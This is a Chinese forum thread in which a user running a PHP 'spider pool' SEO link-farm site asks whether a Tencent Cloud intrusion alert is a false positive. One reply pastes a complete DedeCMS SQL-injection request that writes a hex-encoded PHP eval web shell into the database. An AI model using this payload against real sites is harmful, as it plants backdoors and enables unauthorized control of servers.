企鹅发了短信说被入侵.

sora · 发表于 2018-7-3 22:32:15

自己写的蜘蛛池程序, 纯php, 没有数据库.

外出刚回来看到短信马上ssh.

检查根本就没有这个文件. 继续查web文件, 也没有被修改.

amh4.2的面板, 所有端口都修改, 密码都是长随机字符.

正在webscan.360.cn上扫描, 第一次遇到, 想问问有没有mjj知道或者遇到这种情况, 是不是误报了.

ber · 发表于 2018-7-3 22:35:53

蜘蛛池好用不..

sora · 发表于 2018-7-3 22:37:00

ber 发表于 2018-7-3 22:35

蜘蛛池好用不..
额, 请关注下被入侵这个重点.
蜘蛛池其实都差不多, 原理就那样.

ber · 发表于 2018-7-3 22:38:06

sora 发表于 2018-7-3 22:38

额, 请关注下被入侵这个重点.
蜘蛛池其实都差不多, 原理就那样.
额我猜测是黑产大佬在批量扫描网站漏洞批量尝试exp导致的

比如织梦getshell,
[ol]

http://localhost/dedecms/plus/advancedsearch.php?mid=6&_SESSION[123]=update `%23@__mytag` set normbody=0x3C3F706870206576616C28245F504F53545B635D293B3F3E where aid=1 limit 1&sqlhash=123[/ol]复制代码

这样你缓存文件包含了url就会出现脚本木马啦.. 纯猜测哈

sora · 发表于 2018-7-3 22:35:00

ber 发表于 2018-7-3 22:45

额我猜测是黑产大佬在批量扫描网站漏洞批量尝试exp导致的

比如织梦getshell,
额, 没有缓存文件.
那个目录不是web文件目录, 图片里的tmp目录与web目录同级. 所以有点搞不懂.

ber · 发表于 2018-7-3 22:45:59

sora 发表于 2018-7-3 22:50

额, 没有缓存文件.
那个目录不是web文件目录, 图片里的tmp目录与web目录同级. 所以有点搞不懂. ...
tmp目录是干啥用的呀...

sora · 发表于 2018-7-3 22:38:00

ber 发表于 2018-7-3 22:51

tmp目录是干啥用的呀...
就两个文件.
mysql.sock
php_errors.log
不是网站文件目录. 所以很奇怪.

ber · 发表于 2018-7-3 22:50:13

sora 发表于 2018-7-3 22:56

就两个文件.
mysql.sock
php_errors.log
应该还是网站那边的问题喔是不是程序报错后会出现这种问题

苁林老鬼sora · 发表于 2018-7-3 22:45:00

不能后台提交工单给他们？说下是误报看他们怎么弄呗
ber 发表于 2018-7-3 22:59

应该还是网站那边的问题喔是不是程序报错后会出现这种问题
现在就看360能不能扫出什么破绽来了. 很尴尬.

sora · 发表于 2018-7-3 22:51:15

苁林老鬼发表于 2018-7-3 22:59

不能后台提交工单给他们？说下是误报看他们怎么弄呗
嗯. 得找企鹅的技术问问看, 到底是怎么回事, 连接上去连目标文件都没看到.

		自动登录	找回密码
密码			立即注册

企鹅发了短信说被入侵.

本帖子中包含更多资源

浏览过的版块